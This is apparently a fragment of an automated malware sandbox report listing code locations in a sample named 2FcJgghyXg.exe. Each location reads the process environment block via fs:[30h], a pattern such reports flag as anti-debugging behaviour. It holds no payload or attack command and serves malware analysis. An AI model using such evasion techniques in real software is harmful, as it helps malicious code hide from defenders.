          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_018741C0 mov eax, dword ptr fs:[00000030h]2_2_018741C0
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0179F113 mov eax, dword ptr fs:[00000030h]2_2_0179F113
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0179F113 mov eax, dword ptr fs:[00000030h]2_2_0179F113
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0179F113 mov eax, dword ptr fs:[00000030h]2_2_0179F113
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0179F113 mov eax, dword ptr fs:[00000030h]2_2_0179F113
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0179F113 mov eax, dword ptr fs:[00000030h]2_2_0179F113
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0179F113 mov eax, dword ptr fs:[00000030h]2_2_0179F113
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0179F113 mov eax, dword ptr fs:[00000030h]2_2_0179F113
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0179F113 mov eax, dword ptr fs:[00000030h]2_2_0179F113
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0179F113 mov eax, dword ptr fs:[00000030h]2_2_0179F113
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0179F113 mov eax, dword ptr fs:[00000030h]2_2_0179F113
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0179F113 mov eax, dword ptr fs:[00000030h]2_2_0179F113
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0179F113 mov eax, dword ptr fs:[00000030h]2_2_0179F113
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0179F113 mov eax, dword ptr fs:[00000030h]2_2_0179F113
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0179F113 mov eax, dword ptr fs:[00000030h]2_2_0179F113
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0179F113 mov eax, dword ptr fs:[00000030h]2_2_0179F113
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0179F113 mov eax, dword ptr fs:[00000030h]2_2_0179F113
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0179F113 mov eax, dword ptr fs:[00000030h]2_2_0179F113
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0179F113 mov eax, dword ptr fs:[00000030h]2_2_0179F113
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0179F113 mov eax, dword ptr fs:[00000030h]2_2_0179F113
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0179F113 mov eax, dword ptr fs:[00000030h]2_2_0179F113
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0179F113 mov eax, dword ptr fs:[00000030h]2_2_0179F113
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0185B1EF mov eax, dword ptr fs:[00000030h]2_2_0185B1EF
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_018751F7 mov eax, dword ptr fs:[00000030h]2_2_018751F7
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0184F1F5 mov eax, dword ptr fs:[00000030h]2_2_0184F1F5
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0184F1F5 mov eax, dword ptr fs:[00000030h]2_2_0184F1F5
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0184F1F5 mov eax, dword ptr fs:[00000030h]2_2_0184F1F5
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0184F1F5 mov eax, dword ptr fs:[00000030h]2_2_0184F1F5
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0184F1F5 mov eax, dword ptr fs:[00000030h]2_2_0184F1F5
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0184F1F5 mov eax, dword ptr fs:[00000030h]2_2_0184F1F5
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0184F1F5 mov eax, dword ptr fs:[00000030h]2_2_0184F1F5
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017BB100 mov eax, dword ptr fs:[00000030h]2_2_017BB100
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017991F0 mov eax, dword ptr fs:[00000030h]2_2_017991F0
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017991F0 mov eax, dword ptr fs:[00000030h]2_2_017991F0
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017981EB mov eax, dword ptr fs:[00000030h]2_2_017981EB
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0185F113 mov eax, dword ptr fs:[00000030h]2_2_0185F113
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017C91D4 mov eax, dword ptr fs:[00000030h]2_2_017C91D4
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017D71C8 mov eax, dword ptr fs:[00000030h]2_2_017D71C8
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017D71C8 mov eax, dword ptr fs:[00000030h]2_2_017D71C8
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0187513F mov eax, dword ptr fs:[00000030h]2_2_0187513F
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017A41C0 mov eax, dword ptr fs:[00000030h]2_2_017A41C0
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017A41C0 mov eax, dword ptr fs:[00000030h]2_2_017A41C0
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017A41C0 mov eax, dword ptr fs:[00000030h]2_2_017A41C0
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017A61B9 mov eax, dword ptr fs:[00000030h]2_2_017A61B9
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017DD190 mov eax, dword ptr fs:[00000030h]2_2_017DD190
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017DD190 mov ecx, dword ptr fs:[00000030h]2_2_017DD190
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0185C08D mov eax, dword ptr fs:[00000030h]2_2_0185C08D
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0185B090 mov ecx, dword ptr fs:[00000030h]2_2_0185B090
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0185F0A6 mov eax, dword ptr fs:[00000030h]2_2_0185F0A6
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017A8049 mov eax, dword ptr fs:[00000030h]2_2_017A8049
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017C5044 mov eax, dword ptr fs:[00000030h]2_2_017C5044
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017C5044 mov ecx, dword ptr fs:[00000030h]2_2_017C5044
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_018750BC mov eax, dword ptr fs:[00000030h]2_2_018750BC
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017C903B mov eax, dword ptr fs:[00000030h]2_2_017C903B
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0179D02D mov eax, dword ptr fs:[00000030h]2_2_0179D02D
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017B7010 mov eax, dword ptr fs:[00000030h]2_2_017B7010
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017B7010 mov ecx, dword ptr fs:[00000030h]2_2_017B7010
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017B7010 mov ecx, dword ptr fs:[00000030h]2_2_017B7010
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017B7010 mov eax, dword ptr fs:[00000030h]2_2_017B7010
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017B7010 mov ecx, dword ptr fs:[00000030h]2_2_017B7010
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017B7010 mov ecx, dword ptr fs:[00000030h]2_2_017B7010
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017B7010 mov eax, dword ptr fs:[00000030h]2_2_017B7010
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017B7010 mov eax, dword ptr fs:[00000030h]2_2_017B7010
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017B7010 mov eax, dword ptr fs:[00000030h]2_2_017B7010
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017B7010 mov eax, dword ptr fs:[00000030h]2_2_017B7010
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017B7010 mov eax, dword ptr fs:[00000030h]2_2_017B7010
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017B7010 mov eax, dword ptr fs:[00000030h]2_2_017B7010
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017B7010 mov eax, dword ptr fs:[00000030h]2_2_017B7010
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017B7010 mov eax, dword ptr fs:[00000030h]2_2_017B7010
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017B7010 mov eax, dword ptr fs:[00000030h]2_2_017B7010
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017B7010 mov eax, dword ptr fs:[00000030h]2_2_017B7010
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017B7010 mov eax, dword ptr fs:[00000030h]2_2_017B7010
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017B7010 mov eax, dword ptr fs:[00000030h]2_2_017B7010
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017990F8 mov eax, dword ptr fs:[00000030h]2_2_017990F8
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017990F8 mov eax, dword ptr fs:[00000030h]2_2_017990F8
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017990F8 mov eax, dword ptr fs:[00000030h]2_2_017990F8
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017990F8 mov eax, dword ptr fs:[00000030h]2_2_017990F8
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_01875001 mov eax, dword ptr fs:[00000030h]2_2_01875001
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0179C0F6 mov eax, dword ptr fs:[00000030h]2_2_0179C0F6
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0186A012 mov eax, dword ptr fs:[00000030h]2_2_0186A012
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0182001C mov eax, dword ptr fs:[00000030h]2_2_0182001C
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0182001C mov eax, dword ptr fs:[00000030h]2_2_0182001C
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0182001C mov eax, dword ptr fs:[00000030h]2_2_0182001C
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0182001C mov ecx, dword ptr fs:[00000030h]2_2_0182001C
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0182001C mov eax, dword ptr fs:[00000030h]2_2_0182001C
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0182001C mov eax, dword ptr fs:[00000030h]2_2_0182001C
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0185F027 mov eax, dword ptr fs:[00000030h]2_2_0185F027
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0179B0D6 mov eax, dword ptr fs:[00000030h]2_2_0179B0D6
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0179B0D6 mov eax, dword ptr fs:[00000030h]2_2_0179B0D6
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0179B0D6 mov eax, dword ptr fs:[00000030h]2_2_0179B0D6
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0179B0D6 mov eax, dword ptr fs:[00000030h]2_2_0179B0D6
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017A70B2 mov eax, dword ptr fs:[00000030h]2_2_017A70B2
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017A60B4 mov eax, dword ptr fs:[00000030h]2_2_017A60B4
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017A60B4 mov eax, dword ptr fs:[00000030h]2_2_017A60B4
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0187505D mov eax, dword ptr fs:[00000030h]2_2_0187505D
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0179C090 mov eax, dword ptr fs:[00000030h]2_2_0179C090
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0179A093 mov ecx, dword ptr fs:[00000030h]2_2_0179A093
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017A1091 mov eax, dword ptr fs:[00000030h]2_2_017A1091
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017A1091 mov eax, dword ptr fs:[00000030h]2_2_017A1091
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0185F387 mov eax, dword ptr fs:[00000030h]2_2_0185F387
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017C336D mov eax, dword ptr fs:[00000030h]2_2_017C336D
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0181E3B2 mov eax, dword ptr fs:[00000030h]2_2_0181E3B2
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0181E3B2 mov eax, dword ptr fs:[00000030h]2_2_0181E3B2
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0181E3B2 mov eax, dword ptr fs:[00000030h]2_2_0181E3B2
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0181E3B2 mov eax, dword ptr fs:[00000030h]2_2_0181E3B2
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_018203B1 mov eax, dword ptr fs:[00000030h]2_2_018203B1
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_018203B1 mov eax, dword ptr fs:[00000030h]2_2_018203B1
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017F734A mov eax, dword ptr fs:[00000030h]2_2_017F734A
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017F734A mov eax, dword ptr fs:[00000030h]2_2_017F734A
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0185D3B0 mov eax, dword ptr fs:[00000030h]2_2_0185D3B0
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017BE340 mov eax, dword ptr fs:[00000030h]2_2_017BE340
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017BE340 mov eax, dword ptr fs:[00000030h]2_2_017BE340
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017BE340 mov eax, dword ptr fs:[00000030h]2_2_017BE340
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_01798347 mov eax, dword ptr fs:[00000030h]2_2_01798347
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_01798347 mov eax, dword ptr fs:[00000030h]2_2_01798347
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_01798347 mov eax, dword ptr fs:[00000030h]2_2_01798347
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0179E328 mov eax, dword ptr fs:[00000030h]2_2_0179E328
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0179E328 mov eax, dword ptr fs:[00000030h]2_2_0179E328
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0179E328 mov eax, dword ptr fs:[00000030h]2_2_0179E328
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017AA320 mov eax, dword ptr fs:[00000030h]2_2_017AA320
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017AA320 mov eax, dword ptr fs:[00000030h]2_2_017AA320
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017AA320 mov eax, dword ptr fs:[00000030h]2_2_017AA320
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017AA320 mov eax, dword ptr fs:[00000030h]2_2_017AA320
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017AA320 mov eax, dword ptr fs:[00000030h]2_2_017AA320
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017AA320 mov eax, dword ptr fs:[00000030h]2_2_017AA320
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017A8320 mov eax, dword ptr fs:[00000030h]2_2_017A8320
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017A8320 mov eax, dword ptr fs:[00000030h]2_2_017A8320
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017A8320 mov eax, dword ptr fs:[00000030h]2_2_017A8320
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017A8320 mov eax, dword ptr fs:[00000030h]2_2_017A8320
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0185F3EE mov eax, dword ptr fs:[00000030h]2_2_0185F3EE
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_018693EB mov eax, dword ptr fs:[00000030h]2_2_018693EB
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0181C3F0 mov eax, dword ptr fs:[00000030h]2_2_0181C3F0
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017C3305 mov eax, dword ptr fs:[00000030h]2_2_017C3305
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_01799303 mov eax, dword ptr fs:[00000030h]2_2_01799303
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_01799303 mov eax, dword ptr fs:[00000030h]2_2_01799303
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0187B3FC mov eax, dword ptr fs:[00000030h]2_2_0187B3FC
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0187B3FC mov eax, dword ptr fs:[00000030h]2_2_0187B3FC
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0187B3FC mov eax, dword ptr fs:[00000030h]2_2_0187B3FC
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0187B3FC mov eax, dword ptr fs:[00000030h]2_2_0187B3FC
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017A93E6 mov eax, dword ptr fs:[00000030h]2_2_017A93E6
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017A93E6 mov eax, dword ptr fs:[00000030h]2_2_017A93E6
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0186832E mov eax, dword ptr fs:[00000030h]2_2_0186832E
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0186832E mov eax, dword ptr fs:[00000030h]2_2_0186832E
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017CA3D0 mov eax, dword ptr fs:[00000030h]2_2_017CA3D0
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017CA3D0 mov eax, dword ptr fs:[00000030h]2_2_017CA3D0
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017CA3D0 mov eax, dword ptr fs:[00000030h]2_2_017CA3D0
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0179E3C0 mov eax, dword ptr fs:[00000030h]2_2_0179E3C0
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0179E3C0 mov eax, dword ptr fs:[00000030h]2_2_0179E3C0
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0179E3C0 mov eax, dword ptr fs:[00000030h]2_2_0179E3C0
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017A13C0 mov eax, dword ptr fs:[00000030h]2_2_017A13C0
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017A13C0 mov eax, dword ptr fs:[00000030h]2_2_017A13C0
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017A13C0 mov eax, dword ptr fs:[00000030h]2_2_017A13C0
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017A13C0 mov eax, dword ptr fs:[00000030h]2_2_017A13C0
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017A13C0 mov eax, dword ptr fs:[00000030h]2_2_017A13C0
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0179C3C7 mov eax, dword ptr fs:[00000030h]2_2_0179C3C7
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017BF3B0 mov eax, dword ptr fs:[00000030h]2_2_017BF3B0
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017BF3B0 mov eax, dword ptr fs:[00000030h]2_2_017BF3B0
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017BF3B0 mov eax, dword ptr fs:[00000030h]2_2_017BF3B0
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017BF3B0 mov eax, dword ptr fs:[00000030h]2_2_017BF3B0
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017BF3B0 mov eax, dword ptr fs:[00000030h]2_2_017BF3B0
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017BF3B0 mov eax, dword ptr fs:[00000030h]2_2_017BF3B0
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017C23AA mov eax, dword ptr fs:[00000030h]2_2_017C23AA
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017AB3A0 mov eax, dword ptr fs:[00000030h]2_2_017AB3A0
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017AB3A0 mov eax, dword ptr fs:[00000030h]2_2_017AB3A0
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017AB3A0 mov eax, dword ptr fs:[00000030h]2_2_017AB3A0
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017AB3A0 mov eax, dword ptr fs:[00000030h]2_2_017AB3A0
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017AB3A0 mov eax, dword ptr fs:[00000030h]2_2_017AB3A0
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017AB3A0 mov eax, dword ptr fs:[00000030h]2_2_017AB3A0
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0179B273 mov eax, dword ptr fs:[00000030h]2_2_0179B273
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0179B273 mov eax, dword ptr fs:[00000030h]2_2_0179B273
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0179B273 mov eax, dword ptr fs:[00000030h]2_2_0179B273
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_01875289 mov eax, dword ptr fs:[00000030h]2_2_01875289
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_01873297 mov eax, dword ptr fs:[00000030h]2_2_01873297
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_01873297 mov eax, dword ptr fs:[00000030h]2_2_01873297
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_01873297 mov eax, dword ptr fs:[00000030h]2_2_01873297
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017D324E mov eax, dword ptr fs:[00000030h]2_2_017D324E
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017D324E mov eax, dword ptr fs:[00000030h]2_2_017D324E
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017D424B mov ecx, dword ptr fs:[00000030h]2_2_017D424B
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017D424B mov eax, dword ptr fs:[00000030h]2_2_017D424B
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017D424B mov eax, dword ptr fs:[00000030h]2_2_017D424B
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017DE244 mov eax, dword ptr fs:[00000030h]2_2_017DE244
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017DE244 mov eax, dword ptr fs:[00000030h]2_2_017DE244
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0181E2C9 mov eax, dword ptr fs:[00000030h]2_2_0181E2C9
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017B0231 mov eax, dword ptr fs:[00000030h]2_2_017B0231
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017B0231 mov eax, dword ptr fs:[00000030h]2_2_017B0231
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017B0231 mov eax, dword ptr fs:[00000030h]2_2_017B0231
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017E1230 mov eax, dword ptr fs:[00000030h]2_2_017E1230
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017E1230 mov eax, dword ptr fs:[00000030h]2_2_017E1230
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017AA223 mov eax, dword ptr fs:[00000030h]2_2_017AA223
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017AA223 mov eax, dword ptr fs:[00000030h]2_2_017AA223
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017AA223 mov eax, dword ptr fs:[00000030h]2_2_017AA223
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017AA223 mov eax, dword ptr fs:[00000030h]2_2_017AA223
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017AA223 mov eax, dword ptr fs:[00000030h]2_2_017AA223
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017CB220 mov eax, dword ptr fs:[00000030h]2_2_017CB220
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017CB220 mov eax, dword ptr fs:[00000030h]2_2_017CB220
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017CB220 mov eax, dword ptr fs:[00000030h]2_2_017CB220
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017CB220 mov eax, dword ptr fs:[00000030h]2_2_017CB220
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017CB220 mov eax, dword ptr fs:[00000030h]2_2_017CB220
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017CB220 mov eax, dword ptr fs:[00000030h]2_2_017CB220
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017CB220 mov eax, dword ptr fs:[00000030h]2_2_017CB220
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017A9225 mov eax, dword ptr fs:[00000030h]2_2_017A9225
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017A9225 mov eax, dword ptr fs:[00000030h]2_2_017A9225
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0179821B mov eax, dword ptr fs:[00000030h]2_2_0179821B
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_018752F6 mov eax, dword ptr fs:[00000030h]2_2_018752F6
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0179A200 mov eax, dword ptr fs:[00000030h]2_2_0179A200
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017B0200 mov eax, dword ptr fs:[00000030h]2_2_017B0200
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017B0200 mov eax, dword ptr fs:[00000030h]2_2_017B0200
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017C42EF mov eax, dword ptr fs:[00000030h]2_2_017C42EF
